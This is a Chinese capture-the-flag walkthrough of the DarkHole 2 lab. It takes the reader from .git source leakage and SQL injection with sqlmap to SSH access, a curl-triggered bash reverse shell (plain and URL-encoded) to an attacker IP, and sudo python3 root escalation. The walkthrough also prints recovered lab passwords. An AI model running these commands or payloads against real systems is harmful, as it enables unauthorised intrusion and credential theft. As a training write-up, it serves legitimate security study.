DarkHole 2靶场详细教学

目录

信息收集

0x01 主机发现

0x02 端口扫描

0x03 访问地址

0x04下载源代码分析工具进行源码分析

0x05 登入后台

漏洞利用

0x06 sql注入

权限提升

0x07 内网信息收集

0x08 反弹shell

0x09 提权

总结



信息收集

0x01 主机发现

arp-scan -l

0x02 端口扫描

发现文件目录/.git

nmap -p- -A -T5 -sV 129.168.113.139

0x03 访问地址

访问192.168.113.139,发现后台,访问目录。

0x04下载源代码分析工具进行源码分析

git clone https://github.com/lijiejie/GitHack.git                --下载工具
cd GitHack.git                                                   --进入文件
python GitHack.py http://192.168.113.139/.git/                   --运行py文件
tree                                                             --树状结构

​对源码进行分析,发现并无什么有用信息,在/config/config.php中发现mysql数据库的root账号密码:root:darkhole_2

下载另一个工具

 git clone https://github.com/arthaud/git-dumper.git             --工具下载
 cd git-dumper                                                   --进入文件夹
 python git_dumper.py http://192.168.56.147/.git/ website        --运行程序
 cd website
 git log                                                         --查看log纪录
 git --help                                                 
 git diff a4d900a8d85e8938d3601f3cef113ee293028e10               --查看两次的差异性
 得到邮箱:lush@admin.com      密码:321
运行脚本的时候可能会出现报错的情况,下载一个包就好了
pip install -r requirements.txt                                  --下载一个包

0x05 登入后台

登入后发现URL存在id=1这种字眼,尝试sql注入。

漏洞利用

0x06 sql注入

分别尝试
http://192.168.113.139/dashboard.php?id=1'                            --报错
http://192.168.113.139/dashboard.php?id=1’and1=1--+                   --正常访问

尝试使用sqlmap去爆破

sqlmap -u http://192.168.113.139/dashboard.php?id=1 --cookie='PHPSESSID=hjm9ub21ovlbrus9rkgjn6n5r5' --dump                 --使用cookie爆破
​
发现ssh的账号密码
user:jehad
pass:fool

使用ssh连接,发现是一个普通用户权限

权限提升

0x07 内网信息收集

ls  -al
cat .bash_history

查看历史记录是发现本地端口9999存在命令执行漏洞,尝试执行之后,发现可以执行成功,并且发现这个漏洞的账号用户是losy

0x08 反弹shell

curl "http://127.0.0.1:9999/?cmd=bash -c 'exec bash -i &>/dev/tcp/192.168.113.128/7777 <&1'"
​
curl "http://127.0.0.1:9999/?cmd=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%31%33%2e%31%32%38%2f%37%37%37%37%20%3c%26%31%27"   
                                                   --因为是curl执行,所以需要url编码
                                                   
nc -vlp 7777                                       --kali监听

cd /home/losy
ls -al                                                       --查看文件
cat .bash_history                                            --查看操作历史
发现losy的密码:gang

0x09 提权

ssh登入losy账号

使用sudo -l查看提权条件
使用python3提权
sudo /usr/bin/python3 -c 'import os;os.execl("/bin/bash")'

总结

本次靶场所运用到的知识点

1.源码分析(.git信息泄露)

2.sql注入

3.sudo提权(.bash_histroy历史命令提权)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值